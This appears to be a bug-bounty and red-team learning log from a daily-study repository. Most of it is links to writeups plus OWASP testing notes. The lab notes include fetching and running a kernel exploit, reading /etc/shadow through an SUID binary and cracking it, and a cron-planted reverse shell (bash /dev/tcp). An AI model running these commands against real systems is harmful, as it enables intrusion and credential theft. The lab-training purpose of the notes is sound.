Red team passive recon resources
https://phonebook.cz
https://zoomeye.org
https://spyse.com
https://shodan.io
https://hunter.io

================================================ FILE: Resources/Day 04 Task.md ================================================

🎯 Day 4 Task

✅ Broken Link Hijacking
https://www.youtube.com/watch?v=o1RCqBiyoZ0
https://www.youtube.com/watch?v=eOoW9dQC6ps
https://www.youtube.com/watch?v=dpwoIrO3GFw

Blog
https://edoverflow.com/2017/broken-link-hijacking/
https://medium.com/@iamtess5277/what-is-broken-link-hijacking-o-o-872d821da6fd

Tool
https://www.brokenlinkcheck.com/broken-links.php#
https://github.com/stevenvachon/broken-link-checker

---

✅ THM room by [TryHackMe](https://tryhackme.com/)
https://tryhackme.com/room/phishingemails2rytmuv

---

Github Link
https://github.com/Imran407704/Learn365

#infosec #learn365 #redteam #bugbounty

================================================ FILE: Resources/Day 05 Task.md ================================================

🎯 Day 5 Task

✅ Blind XSS
https://infosecwriteups.com/blind-xss-for-beginners-c88e48083071
https://medium.com/@newp_th/how-i-find-blind-xss-vulnerability-in-redacted-com-33af18b56869
https://ashketchum.medium.com/blind-xss-in-google-analytics-admin-panel-3133-70-2185d1cce82a
https://medium.com/@renwa/new-technique-to-find-blind-xss-c2efcd377cc2
https://medium.com/@jr.mayank1999/exploiting-blind-xss-with-burp-collaborator-client-fec38b5fc5e
https://www.youtube.com/watch?v=GcznQUsNW3s by [@thecyberzeel](https://www.youtube.com/c/SpinTheHack)
https://docs.google.com/presentation/d/1wqx9fnr9v451FHdU33XeXBIg3b_pfhF9X0ttkydrGlk/edit#slide=id.gb07b8690e7_0_156 by [@0xAwali](https://twitter.com/0xAwali)

---

https://tryhackme.com/room/ice - from Connect to Gain Access

#infosec #learn365 #bugbounty

================================================ FILE: Resources/Day 06 Task.md ================================================

🎯 Day 6 Task

✅ log4j
https://infosecwriteups.com/facts-to-clear-about-log4j-for-bug-bounty-hunters-f58e04eb025
https://akashpatil.me/log4j-guide-book.html by [@skypatil98](https://twitter.com/skypatil98)

✅ YouTube Video
https://www.youtube.com/watch?v=d9eejFgdXCc
https://www.youtube.com/watch?v=5PhYLpHFgfc
https://www.youtube.com/watch?v=w2F67LbEtnk

---

✅ THM Room
https://tryhackme.com/room/nmap01

#infosec #learn365 #bugbounty

================================================ FILE: Resources/Day 07 Task.md ================================================

🎯 Day 7 Task

✅ Password Reset Link not expiring
https://shahjerry33.medium.com/password-reset-link-doesnt-expires-on-email-change-39aec24fbed4
https://hackerone.com/reports/685007
https://hackerone.com/reports/898841

✅ YouTube Video
https://www.youtube.com/watch?v=7sx-_qwlt6Q
https://www.youtube.com/watch?v=58Cpt1tzm-w
https://www.youtube.com/watch?v=ZPYwWlTBWJ0

✅ THM Room
https://tryhackme.com/room/windowsfundamentals1xbx

#bugbounty #infosec #learn365

================================================ FILE: Resources/Day 08 Task.md ================================================

🎯 Day 8 Task

✅ How to report DMARC?
https://medium.com/techiepedia/how-to-report-dmarc-vulnerabilities-efficiently-to-earn-bounties-easily-f7a65ecdd20b
https://shahjerry33.medium.com/mail-server-misconfiguration-f42734d19678

✅ YouTube Video
https://www.youtube.com/watch?v=LNwjEK4Ckyc
https://www.youtube.com/watch?v=nlFAj2raoj4

✅ THM Room
https://tryhackme.com/room/overlayfs

#bugbounty #infosec #learn365

================================================ FILE: Resources/Day 09 Task.md ================================================

🎯 Day 9 Task

✅ CSRF Video
https://www.youtube.com/watch?v=iyE9UsBF64w

✅ POC
https://www.youtube.com/watch?v=TGJ4I-F5LhE
https://www.youtube.com/watch?v=YPnejsLPfVk
https://www.youtube.com/watch?v=gBdiKqNPQS8
https://www.youtube.com/watch?v=5jHIUTEdpvI

✅ CSRF Writeup
https://infosecwriteups.com/understanding-exploiting-cross-site-request-forgery-csrf-vulnerabilities-935952375b71
https://huntr.dev/bounties/f952af13-8042-457d-b8d8-bd338987dc02/

✅ Tweet
https://twitter.com/rootxyash/status/1480126074994368512
https://twitter.com/mavericknerd/status/1214071332083658757

---

🔁 THM Room ➡ Working on the Linux PrivEsc Room
✅ Completed till Task 6: Privilege Escalation - Sudo
https://tryhackme.com/room/linprivesc

For more info check out my Github Repo https://github.com/Imran407704/Learn365/

Some Tips :

The kernel exploit methodology is simple:
1. Identify the kernel version
2. Search for and find exploit code for the kernel version of the target system
3. Run the exploit

Remember that a failed kernel exploit can lead to a system crash :P

The sudo exploit methodology:
1. First check which programs the normal user can run with sudo rights: sudo -l
go to https://gtfobins.github.io & search the binary file which have sudo rights 3. Paste that Command & You are Root User :) Some Keywords : | String | Meaning | | ----------------- | --------------------------------- | | Local system | My Computer | | EXPL_FILE | Name of that Particular Exploit (in my case the name of exploit is 37292) | | IP:PORT | VPN IP (If you are on tryhackme) / local system IP:jo port se http server bana tha | | - (hypen) | hypen ke baad command hai :) | My Steps for Kernel Exploit : 1. Exploit ko local system me - wget https://www.exploit-db.com/exploits/EXPL_FILE se download kiya 2. gcc se complile kiya - gcc 37292.c exploit 3. local system me http server banaya - sudo python3 -m http.server 4. & Then target machine ke tmp (temp) directory me jaana hai bcoz yehi directory aisi hai jisme hamey write ki permission hai mai ne home directory me bhi check kiya but waha par exploit ko local machine se transfer nhi kar pa rha tha - wget http://IP:PORT/exploit (remember that http use karna hai not https ) 5. ./exploit ROOT User :) My Steps for Sudo Exploit : 1. First check how many programs normal user run with sudo rights - sudo -l 2. 
go to https://gtfobins.github.io & search the binary file which have sudo rights ------------------------------------------------------------------------------------------------------------------------------------------------------ #bugbounty #privesc #infosec #learn365 ================================================ FILE: Resources/Day 10 Task.md ================================================ 🎯 Day 10 Task ✅ Clickjacking https://www.youtube.com/watch?v=Unu41TIk8CY ✅ Poc https://www.youtube.com/watch?v=rz2XmteeFMo ✅ Writeup https://medium.com/@raushanraj_65039/google-clickjacking-6a04132b918a https://hackerone.com/reports/299009 🔁 TryHackMe Room ➡️ Working on Linux PrivEsc ✅ Completed Task 7 Privilege Escalation SUID 😒 I Saw a Walkthrough bcoz this is my 1st PrivEsc Some Tips: **cat /etc/passwd** me se user ka naam mila (1st answer) Command for listing the binaries file which has SUID & SGID bits **find / -type f -perm -04000 -ls 2>/dev/null** Har 1 Binary ko gtfobins me dekha koi SUID ke saath exploit hai kya **base64** mila Fir **LFILE=/etc/shadow** **/usr/bin/base64 “$LFILE” | base64 –decode** : karke passwd ka hash nikala & then Hash ko ek file me save kiya **hash.txt** **john hash.txt --show** : mil gaya passwd **su user2 & passwd** **cd home/ubuntu** **cat flag3.txt** but permission denied then Then try **LFILE=/home/ubuntu/flag3.txt** **/usr/bin/base64 “$LFILE” | base64 –decode** **cat flag3.txt** & got flag :) ================================================ FILE: Resources/Day 100 Task.md ================================================ 🎯 Day 100 Task 🥳🥳🥳 Yay Glad to Share that I am Consistently learning #infosec #bugbounty & today is my #Day100 I learned a lots of new things & explored New Stuff Daily This is the best Feeling ever & This is my Small Achivement.🥳🥳🥳 Alhamdulillah For everything !!!! 
✅ RCE with Flask Jinja Template Injection https://akshukatkar.medium.com/rce-with-flask-jinja-template-injection-ea5d0201b870 #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 101 Task.md ================================================ 🎯 Day 101 Task ✅ How I could have hacked your Uber account https://www.appsecure.security/blog/how-i-could-have-hacked-your-uber-account #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 102 Task.md ================================================ 🎯 Day 102 Task ✅ Bug Bounty Live Recon - Linked / JS Discovery! https://youtu.be/yT_IqBMwLFg #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 103 Task.md ================================================ 🎯 Day 103 Task ✅ HTTP Request Smuggling on business.apple.com and Others https://medium.com/@StealthyBugs/http-request-smuggling-on-business-apple-com-and-others-2c43e81bcc52 #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 104 Task.md ================================================ 🎯 Day 104 Task ✅ SVG SSRFs and saga of bypasses https://infosecwriteups.com/svg-ssrfs-and-saga-of-bypasses-777e035a17a7 ✅ A Detailed Guide on Cewl https://www.hackingarticles.in/a-detailed-guide-on-cewl/ #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 105 Task.md ================================================ 🎯 Day 105 Task ✅ How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty https://infosecwriteups.com/how-a-youtube-video-lead-to-pwning-a-web-application-via-sql-injection-worth-4324-bounty-285f0a9b9f6c #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 106 Task.md ================================================ 🎯 Day 106 Task ✅ XSS | HTML Injection and File Upload Bypass in 
HUAWEI Subdomain https://medium.com/@Bishoo97x/xss-html-injection-and-file-upload-bypass-in-huawei-subdomain-64966ba4f4ac #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 107 Task.md ================================================ 🎯 Day 107 Task ✅ How Token Misconfiguration can lead to takeover account https://cryptograph3r.blogspot.com/2022/03/how-token-misconfiguration-can-lead-to.html #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 108 Task.md ================================================ 🎯 Day 108 Task ✅ How to hack any Payment Gateway? https://infosecwriteups.com/how-to-hack-any-payment-gateway-1ae2f0c6cbe5 #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 109 Task.md ================================================ 🎯 Day 109 Task ✅ Race Condition bypassing team limit https://arbazhussain.medium.com/race-condition-bypassing-team-limit-b162e777ca3b #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 11 Task.md ================================================ 🎯 Day 11 Task ✅ Learn Something new in Live Bug Hunting Session 🔁 TryHackMe Room ➡️ Working on Linux PrivEsc ✅ Completed Task 8 Privilege Escalation **Capabilities** My Steps : First enter this command for checking how many binaries have capabilities **getcap -r / 2>/dev/null** Then I go to the home & other user directory **cd /home/ubuntu** & then **ls -a** **id** **cat flag4.txt** #learn365 #infosec ================================================ FILE: Resources/Day 110 Task.md ================================================ 🎯 Day 110 Task ✅ Bypass Apple Corp SSO on Apple Admin Panel https://medium.com/@StealthyBugs/bypass-apple-corp-sso-on-apple-admin-panel-dbfb72c7e634 #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 111 Task.md 
================================================ 🎯 Day 111 Task ✅ The Unusual Case of Status code- 301 Redirection to AWS Security Credentials Compromise https://logicbomb.medium.com/the-unusual-case-of-open-redirection-to-aws-security-credentials-compromise-59acc312f02b #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 112 Task.md ================================================ 🎯 Day 112 Task ✅ Find security bugs while you sleep! Using nuclei templates, and more.. https://youtu.be/P5asvR0h3OQ #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 113 Task.md ================================================ 🎯 Day 113 Task ✅ Getting access to disabled/hidden features with the help of Burpsuite Match and Replace settings https://medium.com/@johnssimon_6607/getting-access-to-disabled-hidden-features-with-the-help-of-burp-match-and-replace-e1d7b70d131e #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 114 Task.md ================================================ 🎯 Day 114 Task ✅ Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044) https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 115 Task.md ================================================ 🎯 Day 115 Task ✅ How I chained two vulnerabilities to steal credit card details? 
https://www.codedbrain.com/how-i-chained-two-vulnerabilities-to-steal-credit-card-details/
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 116 Task.md ================================================
🎯 Day 116 Task
✅ How I Made The BBC Hall Of Fame 3 Times
https://medium.com/@tobydavenn/how-i-made-the-bbc-hall-of-fame-3-times-2c816fa515d7
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 117 Task.md ================================================
🎯 Day 117 Task
✅ Improper cookie not expiring after logged out!
https://medium.com/@mujios101/improper-cookie-not-expiring-after-logged-out-ba43e9033459
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 118 Task.md ================================================
🎯 Day 118 Task
✅ Open-Redirects
https://medium.com/@souravgro25/open-redirects-a93b01f31868
✅ What you doing wrong when you fail at bug bounties?
https://medium.com/@gguzelkokar.mdbf15/what-you-doing-wrong-when-you-fail-at-bug-bounties-143d2e0e6e2b
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 119 Task.md ================================================
🎯 Day 119 Task
✅ Bypassing WAF for $2222
https://divyanshsharma2401.medium.com/bypassing-waf-for-2222-f99b80cfdb9b
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 12 Task.md ================================================
🎯 Day 12 Task
➡️ Working on Bug bounty Wordlist tool inspired by [Kathan Patel](https://twitter.com/KathanP19)
🔁 TryHackMe Room ➡️ Working on Linux PrivEsc
✅ Completed Task 9 Privilege Escalation Cronjob
My Steps :
First find out which cron jobs are set: **cat /etc/crontab**
Then edit the script **nano /../..file.sh** so that it contains:
**#!/bin/bash**
**bash -i >& /dev/tcp/IP/PORT 0>&1** ---------------> [ Here IP = TryHackMe VPN IP & the same PORT number which you use in nc ]
Then run **nc -lvnp PORT**, wait some minutes & then you get a root shell :)
#infosec #learn365 #privesc
================================================ FILE: Resources/Day 120 Task.md ================================================
🎯 Day 120 Task
✅ Subdomain Takeover using Mobile??
https://0xshakhawat.medium.com/subdomain-takeover-using-mobile-da9c8e81bc1c
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 121 Task.md ================================================
🎯 Day 121 Task
✅ Fuzzing and credentials leakage..awesome bug hunting writeup
https://medium.com/@abdalrahman.alshammas/fuzzing-and-credentials-leakage-nice-bug-hunting-writeup-38b2e774b300
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 122 Task.md ================================================
🎯 Day 122 Task
✅ OTP bypass with response manipulation.
https://ertugrull.medium.com/otp-bypass-with-response-manipulation-12646c6d7f33
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 123 Task.md ================================================
🎯 Day 123 Task
There is no task today. Enjoy the Eid festival 🥳😊😃
#learn365 #eid2022 #eidmubarak2022
================================================ FILE: Resources/Day 124 Task.md ================================================
🎯 Day 124 Task
✅ An Bug Bounty Hunter's Guide to IDOR Vulnerabilities
https://medium.com/@daniel.j.hunt/an-bug-bounty-hunters-guide-to-idor-vulnerabilities-27012bbccd7
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 125 Task.md ================================================
🎯 Day 125 Task
✅ How I got a lousy T-Shirt from the Dutch Government.
https://maxva.medium.com/how-i-got-a-lousyt-shirt-from-the-dutch-goverment-2a0d13fe7675
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 126 Task.md ================================================
🎯 Day 126 Task
✅ Hack the Hackers
https://raoshaab.medium.com/hack-the-hackers-7d4ffbc70858
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 127 Task.md ================================================
🎯 Day 127 Task
✅ The $16,000 Dev Mistake
https://medium.com/@masonhck357/the-16-000-dev-mistake-13e516e86be6
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 128 Task.md ================================================
🎯 Day 128 Task
✅ Denial of Service through …
https://medium.com/@sathvika03/denial-of-service-through-55368b323839
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 129 Task.md ================================================
🎯 Day 129 Task
✅ How I found a vulnerability that leads to access any users' sensitive data and got $500
https://medium.com/@robert0/how-did-i-find-a-vulnerability-that-leads-to-access-any-users-sensitive-data-and-got-500-5cce1c21d86a
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 13 Task.md ================================================
🎯 Day 13 Task
✅ Start Learning OWASP Web Application Security Testing
4.1 Information Gathering
✅ 4.1.1 Conduct Search Engine Discovery Reconnaissance for Information Leakage
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage
https://infosecwriteups.com/dorking-for-bug-bounties-d81cc857b2c8
✅ Tools https://github.com/BullsEye0/dorks-eye
🔁 THM Room ⏸️ Pause Linux PrivEsc ➡️ Working on Linux PrivEsc Arena
https://tryhackme.com/room/linuxprivescarena #infosec #learn365 #owasp ================================================ FILE: Resources/Day 130 Task.md ================================================ 🎯 Day 130 Task ✅ ToolTime - Cloud Recon 1 https://youtu.be/7hKEfF-yR1w #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 131 Task.md ================================================ 🎯 Day 131 Task ✅ A Fun SSRF through a Headless Browser https://corben.io/fun-ssrf-via-headless-browser/ #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 132 Task.md ================================================ 🎯 Day 132 Task ✅ 2FA Bypass in PickMyCareer.in https://jayateerthag.medium.com/2fa-bypass-in-pickmycareer-in-8abbde4c4903 #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 133 Task.md ================================================ 🎯 Day 133 Task ✅ Exploiting Google Maps API keys for profit https://infosecwriteups.com/exploiting-google-maps-api-keys-for-profit-3903dd2c829c #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 134 Task.md ================================================ 🎯 Day 134 Task ✅ Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$ https://medium.com/@unurbayar1998/creator-studios-api-endpoint-is-vulnerable-to-idor-exposes-p40-earnings-usd-f57327759ffc #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 135 Task.md ================================================ 🎯 Day 135 Task ✅ I have 1% chance to hack this company https://infosecwriteups.com/i-have-1-chance-to-hack-this-company-1044879f41a9 #infosec #learn365 #bugbounty ================================================ FILE: Resources/Day 136 Task.md ================================================ 🎯 Day 136 Task ✅ HTTP Request Smuggling: 
Part-1 (Concepts)
https://medium.com/nerd-for-tech/http-request-smuggling-part-1-concepts-b89bfe17b210
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 137 Task.md ================================================
🎯 Day 137 Task
✅ Create Your Ultimate Bug Boun​ty Automation Without Nerdy Bash Skills (Part 1)
https://infosecwriteups.com/create-your-ultimate-bug-bounty-automation-without-nerdy-bash-skills-part-1-a78c2b109731
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 138 Task.md ================================================
🎯 Day 138 Task
✅ Can analyzing javascript files lead to remote code execution?
https://melotover.medium.com/can-analyzing-javascript-files-lead-to-remote-code-execution-f24112f1aa1f
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 139 Task.md ================================================
🎯 Day 139 Task
✅ My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees Information's & In Some cases Passwords At More Than 1000 Companies
https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 14 Task.md ================================================
🎯 Day 14 Task
✅ 4.1.2 Fingerprint Web Server
_Objective_
Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.
✅ How to Test
Nmap - **nmap -sV --script=banner TARGET**
Note : Exposed server information is not necessarily a vulnerability in itself; it is information that can assist attackers in exploiting other vulnerabilities that may exist.
✅ Remediation
1. Obscuring web server information in headers, such as with Apache's mod_headers module.
2. Using a hardened reverse proxy server to create an additional layer of security between the web server and the Internet.
3. Ensuring that web servers are kept up-to-date with the latest software and security patches.
✅ THM Room https://tryhackme.com/room/linuxprivescarena
Github Repo https://github.com/Imran407704/Learn365
**Disclaimer- I am making notes from the official OWASP website, you can check it from here** https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================ FILE: Resources/Day 140 Task.md ================================================
🎯 Day 140 Task
✅ Origin IP found, WAF Cloudflare Bypass
https://hackerone.com/reports/1536299
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 141 Task.md ================================================
🎯 Day 141 Task
✅ MFA (Multi-Factor Authentication)
https://akash-venky091.medium.com/mfa-multi-factor-authentication-24d2002b9ad7
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 142 Task.md ================================================
🎯 Day 142 Task
✅ Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click
https://medium.com/@h4x0r_dz/vulnerability-in-paypal-worth-200000-bounty-attacker-can-steal-your-balance-by-one-click-2b358c1607cc
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 143 Task.md ================================================
🎯 Day 143 Task
✅ Does ms15–034 still exist today ?
https://medium.com/@ryuukhagetsu/does-ms15-034-still-exist-today-c7e11664349c
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 144 Task.md ================================================
🎯 Day 144 Task
✅ How I managed to take over any account visits my profile with Stored XSS
https://0xmahmoudjo0.medium.com/how-i-managed-to-take-over-any-account-visits-my-profile-with-stored-xss-6b378d33e90f
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 145 Task.md ================================================
🎯 Day 145 Task
✅ The Bucket's Got a Hole in it
https://medium.com/@manikesh-singh/the-buckets-got-a-hole-in-it-343b676e23d4
#infosec #learn365 #bugbounty
================================================ FILE: Resources/Day 15 Task.md ================================================
🎯 Day 15 Task
✅ 4.1.3 Review Webserver Metafiles for Information Leakage
Objective
1. Identify hidden or obfuscated paths and functionality through the analysis of metadata files.
2. Extract and map other information that could lead to better understanding of the systems at hand.
✅ How to Test
Spider/crawler, Google Dorks, Burpsuite/ZAP
1. robots.txt - curl -O -Ss http://www.TARGET.TLD/robots.txt
2. Sitemap.xml - wget --no-verbose https://www.TARGET.TLD/sitemap.xml
3. Security.txt - wget --no-verbose https://www.linkedin.com/.well-known/security.txt (served at https://TARGET.TLD/security.txt or https://TARGET.TLD/.well-known/security.txt)
4. humans.txt - wget --no-verbose https://www.google.com/humans.txt
✅ Tools wget, BurpSuite, Dev Tools
✅ THM Room https://tryhackme.com/room/linuxfundamentalspart3
Github Repo https://github.com/Imran407704/Learn365
Disclaimer- I am making notes from the official OWASP website, you can check it from here https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
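The robots.txt and sitemap.xml commands above only fetch the files; the useful part of 4.1.3 is turning them into a list of paths the operator would rather you did not visit. The following is an added example, not code from the Learn365 repo or from OWASP, that parses both formats offline on constructed sample files (the host www.example.test and every path in them are made up for illustration):

```python
"""Harvest candidate paths from robots.txt and sitemap.xml (added example)."""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin

# Constructed sample files for a fictitious host; not fetched from any real target.
ROBOTS_TXT = """\
# robots.txt (constructed sample)
User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /public/
Disallow: /api/internal/

User-agent: Googlebot
Disallow: /staging/

Sitemap: https://www.example.test/sitemap.xml
"""

SITEMAP_XML = """\
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>https://www.example.test/</loc></url>
  <url><loc>https://www.example.test/old-portal/login</loc></url>
  <url><loc>https://www.example.test/public/docs</loc></url>
</urlset>
"""


def parse_robots(text):
    """Return ({user_agent: [(directive, path), ...]}, [sitemap_url, ...]).

    Consecutive User-agent lines form one group that shares the rules that
    follow; a User-agent line after a rule block starts a new group.
    """
    rules, sitemaps, agents = {}, [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and whitespace
        if ":" not in line:
            continue  # blank lines and junk
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key == "user-agent":
            if agents and rules[agents[-1]]:
                agents = []  # previous group already has rules: start a new group
            agents.append(value)
            rules.setdefault(value, [])
        elif key in ("allow", "disallow") and value:
            for agent in agents:
                rules[agent].append((key, value))
        elif key == "sitemap":
            sitemaps.append(value)
    return rules, sitemaps


def sitemap_locs(xml_text):
    """Extract <loc> URLs from a sitemap, ignoring the XML namespace prefix."""
    root = ET.fromstring(xml_text)
    return [el.text.strip() for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "loc" and el.text]


def hidden_paths(base_url, robots_text, sitemap_text=None):
    """Absolute URLs worth visiting: every Disallow entry plus every sitemap entry."""
    rules, sitemaps = parse_robots(robots_text)
    found = set()
    for entries in rules.values():
        for directive, path in entries:
            if directive == "disallow":  # "please do not look here" is exactly where to look
                found.add(urljoin(base_url, path))
    if sitemap_text is not None:
        found.update(sitemap_locs(sitemap_text))
    return sorted(found), sitemaps


if __name__ == "__main__":
    urls, maps = hidden_paths("https://www.example.test/", ROBOTS_TXT, SITEMAP_XML)
    print("sitemaps declared:", maps)
    for url in urls:
        print(url)
```

Feed the output to the spider or to a directory brute-forcer as a seed list; a Disallow entry is not an access control, only a hint about where the interesting content lives.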
#infosec #learn365 #owasp
================================================ FILE: Resources/Day 16 Task.md ================================================
🎯 Day 16 Task
✅ 4.1.4 Enumerate Applications on Webserver
Test Objectives
Enumerate the applications within scope that exist on a web server.
1. Different Base URL
2. Non-standard Ports
3. Virtual Hosts
4. DNS Zone Transfers
5. DNS Inverse Queries
6. Web-based DNS Searches
7. Reverse-IP Services
8. Googling
9. Digital Certificates
✅ Tools
1. nslookup, dig
2. Search engines - Google, Bing
3. Nmap
Github Repo https://github.com/Imran407704/Learn365
Disclaimer- I am making notes from the official OWASP website, you can check it from here https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
#infosec #learn365 #owasp
================================================ FILE: Resources/Day 17 Task.md ================================================
🎯 Day 17 Task
✅ 4.1.5 Review Webpage Content for Information Leakage
Test Objectives
1. Review webpage comments, metadata, and redirect bodies to find any information leakage.
2. Gather JavaScript files and review the JS code to better understand the application and to find any information leakage.
3. Identify if source map files or other front-end debug files exist.
How to Test
1. Review Webpage, Comments and Metadata
2. Identifying JavaScript Code and Gathering JavaScript Files (look for values such as: API keys, internal IP addresses, sensitive routes, or credentials)
3. Identifying Source Map Files
4. Identify Redirect Responses which Leak Information
Tools Burpsuite/ZAP, wget
✅ THM Room https://tryhackme.com/room/passiverecon
Note- I am making notes from the official OWASP website, you can check it from here https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others !!!
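For step 2 of Day 17 (reviewing gathered JavaScript for API keys, internal IP addresses, sensitive routes or credentials) and step 3 (source maps), here is an added example, not code from the Learn365 repo or from OWASP, that runs a small set of regular expressions over a constructed bundle. The sample bundle, its host names and its key-shaped strings are invented; the AWS and Google patterns are the documented formats (AKIA plus 16 upper-case alphanumerics, AIza plus 35 URL-safe characters), and the redaction step exists so a finding can go into a report without carrying a usable key:

```python
"""Scan JavaScript for leaked keys, credentials, internal hosts, routes and source maps (added example)."""
import re

# Constructed sample bundle. The key-shaped strings follow the documented
# formats (AWS "AKIA..." IDs, Google "AIza..." keys) but are not real credentials.
SAMPLE_JS = r"""
//# sourceMappingURL=app.min.js.map
const cfg = {
  apiBase: "/api/v2/internal",
  mapsKey: "AIzaSyA-EXAMPLEEXAMPLEEXAMPLEEXAMPLE012",
  awsKey: "AKIAIOSFODNN7EXAMPLE",
  debugHost: "http://10.20.30.40:8081/health"
};
fetch(cfg.apiBase + "/users/export");
const legacy = "ftp://deploy:Passw0rd@build.internal.example.test/";
"""

PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    # scheme://user:password@host
    "credentials_in_url": re.compile(r"\b[a-z][a-z0-9+.-]*://[^/\s:@\"']+:[^/\s@\"']+@[^\s\"']+"),
    # RFC 1918 ranges: 10/8, 172.16/12, 192.168/16
    "internal_ip": re.compile(r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3})\b"),
    "api_route": re.compile(r"[\"'](/api/[A-Za-z0-9_./-]*)[\"']"),
    "source_map": re.compile(r"//[#@]\s*sourceMappingURL=(\S+)"),
}


def scan_js(text):
    """Return {kind: [unique matches in order of appearance]} for every pattern that hit."""
    findings = {}
    for kind, pattern in PATTERNS.items():
        hits = []
        for m in pattern.finditer(text):
            value = m.group(1) if m.groups() else m.group(0)
            if value not in hits:
                hits.append(value)
        if hits:
            findings[kind] = hits
    return findings


def redact(value):
    """Keep only the first four and last two characters of a secret."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 6) + value[-2:]


def report(text):
    """Human-readable lines; key-like values are redacted, routes, IPs and maps shown in full."""
    lines = []
    for kind, hits in scan_js(text).items():
        secret = kind.endswith(("_key", "_key_id")) or kind == "credentials_in_url"
        for hit in hits:
            lines.append(f"{kind}: {redact(hit) if secret else hit}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_JS)))
```

A hit on a key pattern is a lead, not a finding: confirm the key is live against the vendor's API only if the programme's rules allow it, and never paste the full value into the report.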
#infosec #learn365 #owasp
================================================ FILE: Resources/Day 18 Task.md ================================================
🎯 Day 18 Task
✅ P1 Bugs WriteUp
https://medium.com/@harrmahar/how-i-get-my-first-p1-sensitive-information-disclosure-using-wpscan-c2fba00ac361
https://medium.com/@sw33tlie/finding-a-p1-in-one-minute-with-shodan-io-rce-735e08123f52
https://medium.com/techiepedia/my-easiest-critical-bug-81c341a0d6d4
✅ 4.1.6 Identify Application Entry Points
Test Objectives
1. Identify possible entry and injection points through request and response analysis.
Requests
1. Identify where GETs are used and where POSTs are used.
2. Identify all parameters used in a POST request (these are in the body of the request).
3. Within the POST request, pay special attention to any hidden parameters. When a POST is sent, all the form fields (including hidden parameters) will be sent in the body of the HTTP message to the application. These typically aren't seen unless a proxy is used or the HTML source code is viewed. In addition, the next page shown, its data, and the level of access can all be different depending on the value of the hidden parameter(s).
4. Identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark).
